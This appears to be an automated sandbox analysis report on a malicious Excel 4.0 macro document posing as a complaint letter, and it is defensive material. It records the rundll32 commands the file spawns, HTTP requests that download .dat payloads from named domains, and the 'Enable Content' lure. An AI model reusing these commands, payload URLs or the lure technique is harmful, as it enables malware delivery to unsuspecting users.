Loading ...

Play interactive tourEdit tour

Analysis Report Complaint_Letter_1186814227-02192021.xls

Overview

General Information

Sample Name:Complaint_Letter_1186814227-02192021.xls
Analysis ID:356762
MD5:888909141f8ad83f4509703b1bae7187
SHA1:dab7c94aff5dbeabebf9d85c6b2e7f6e6ba98e18
SHA256:f11a1405772bbb1aa0d1e55fc2faa77fe8a5541894e9617fbd8e6430c9e38731
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2060 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2768 cmdline: rundll32 ..\KLSD.ggsso,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2792 cmdline: rundll32 ..\KLSD.ggsso1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2748 cmdline: rundll32 ..\KLSD.ggsso2,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2472 cmdline: rundll32 ..\KLSD.ggsso3,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2404 cmdline: rundll32 ..\KLSD.ggsso4,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Complaint_Letter_1186814227-02192021.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0xaee5:$e1: Enable Editing
  • 0x15980:$e1: Enable Editing
  • 0x159ca:$e1: Enable Editing
  • 0x200ee:$e1: Enable Editing
  • 0x20138:$e1: Enable Editing
  • 0x159e8:$e2: Enable Content
  • 0x20156:$e2: Enable Content
Complaint_Letter_1186814227-02192021.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\KLSD.ggsso,DllRegisterServer, CommandLine: rundll32 ..\KLSD.ggsso,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2060, ProcessCommandLine: rundll32 ..\KLSD.ggsso,DllRegisterServer, ProcessId: 2768

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    Compliance:

    barindex
    Uses new MSVCR DllsShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Uses secure TLS version for HTTPS connectionsShow sources
    Source: unknownHTTPS traffic detected: 159.89.174.35:443 -> 192.168.2.22:49167 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.126.100.34:443 -> 192.168.2.22:49173 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
    Source: global trafficDNS query: name: parama-college.id
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 159.89.174.35:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 203.142.76.236:80
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: global trafficHTTP traffic detected: GET /yxpmmmg/44250678185879600000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: parama-college.idConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /zdmqwymhhza/44250678185879600000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: raivens.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /hmffuzbolyio/44250678185879600000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sportsmarquee.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /focahjqevd/44250678185879600000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: erp.demosoftware.bizConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /gvazzbwlvyk/44250678185879600000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jayshreewoods.comConnection: Keep-Alive
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
    Source: global trafficHTTP traffic detected: GET /yxpmmmg/44250678185879600000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: parama-college.idConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /zdmqwymhhza/44250678185879600000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: raivens.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /hmffuzbolyio/44250678185879600000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sportsmarquee.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /focahjqevd/44250678185879600000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: erp.demosoftware.bizConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /gvazzbwlvyk/44250678185879600000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jayshreewoods.comConnection: Keep-Alive
    Source: rundll32.exe, 00000004.00000002.2201614246.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192301052.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183231178.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: unknownDNS traffic detected: queries for: parama-college.id
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Feb 2021 15:16:23 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://sportsmarquee.com/wp-json/>; rel="https://api.w.org/"Set-Cookie: cxssh_status=off; expires=Thu, 03-Jun-2021 15:16:55 GMT; Max-Age=8640000; path=/Keep-Alive: timeout=5, max=1000Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 53 70 6f 72 74 73 20 4d 61 72 71 75 65 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 70 6f 72 74 73 6d 61 72 71 75 65 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 73 6d 61 72 74 2d 63 6f 75 70 6f 6e 73 2f 61 73 73 65 74 73 2f 63 73 73 2f 73 6d 61 72 74 2d 63 6f 75 70 6f 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 34 2e 31 2e 32 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 70 6f 72 74 73 6d 61 72 71 75 65 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 66 6f 72 6d 69 64 61 62 6c 65 2f 63 73 73 2f 66 6f 72 6d 69 64 61 62 6c 65 66 6f 72 6d 73 2e 63 73 73 3f 76 65 72 3d 31 31 31 34 31 36 31 32 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 70 6f 72 74 73 6d 61 72 71 75 65 65 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 64 69 73 74 2f 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 35 2e 35 2e 33 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 70 6f 72 74 73 6d 61 72 71 75 65 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2f 70 61 63 6b 61 67 65 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 62 6c 6f 63 6b 73 2f 62 75 69 6c 64 2f 76 65 6e 64 6f 72 73 2d 73 74 79 6c 65 2e 63 73 73 3f 76 65 72 3d 33 2e 36 2e 30 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 70
    Source: rundll32.exe, 00000004.00000002.2201614246.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192301052.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183231178.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000004.00000002.2201614246.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192301052.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183231178.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: rundll32.exe, 00000004.00000002.2201804166.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192488576.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183410930.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180940139.0000000001DE7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: rundll32.exe, 00000004.00000002.2201804166.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192488576.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183410930.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180940139.0000000001DE7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: rundll32.exe, 00000004.00000002.2201804166.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192488576.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183410930.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180940139.0000000001DE7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: rundll32.exe, 00000004.00000002.2201804166.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192488576.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183410930.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180940139.0000000001DE7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: rundll32.exe, 00000004.00000002.2201614246.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192301052.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183231178.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: rundll32.exe, 00000004.00000002.2201804166.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192488576.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183410930.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180940139.0000000001DE7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000004.00000002.2201614246.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192301052.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183231178.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
    Source: unknownHTTPS traffic detected: 159.89.174.35:443 -> 192.168.2.22:49167 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.126.100.34:443 -> 192.168.2.22:49173 version: TLS 1.2

    System Summary:

    barindex
    Found malicious Excel 4.0 MacroShow sources
    Source: Complaint_Letter_1186814227-02192021.xlsInitial sample: urlmon
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing, please click E. " ' " 14 from the yellow bar above f ynOll Xd 15 R'|ni)|| I P? I
    Source: Screenshot number: 8Screenshot OCR: Enable Editing, please click E' " " ' ' 14 from the yellow bar above RunDLL |~| 15 16 Therewasa
    Source: Document image extraction number: 2Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
    Source: Document image extraction number: 2Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 8Screenshot OCR: Enable Editing from the yellow bar above @ Once You have Enable Editing, please click Enable Conte
    Source: Document image extraction number: 8Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? wYou are using IDS or Andr
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: Complaint_Letter_1186814227-02192021.xlsInitial sample: EXEC
    Source: Complaint_Letter_1186814227-02192021.xlsOLE indicator, VBA macros: true
    Source: Complaint_Letter_1186814227-02192021.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
    Source: rundll32.exe, 00000004.00000002.2201614246.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2192301052.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2183231178.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2180715449.0000000001C00000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal76.expl.evad.winXLS@11/13@5/5
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\72CE0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBAE5.tmpJump to behavior
    Source: Complaint_Letter_1186814227-02192021.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\KLSD.ggsso,DllRegisterServer
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\KLSD.ggsso,DllRegisterServer
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\KLSD.ggsso1,DllRegisterServer
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\KLSD.ggsso2,DllRegisterServer
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\KLSD.ggsso3,DllRegisterServer
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\KLSD.ggsso4,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\KLSD.ggsso,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\KLSD.ggsso1,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\KLSD.ggsso2,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\KLSD.ggsso3,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\KLSD.ggsso4,DllRegisterServer
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: Complaint_Letter_1186814227-02192021.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol14Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer4SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    parama-college.id2%VirustotalBrowse
    erp.demosoftware.biz0%VirustotalBrowse
    sportsmarquee.com1%VirustotalBrowse
    raivens.com0%VirustotalBrowse

    URLs

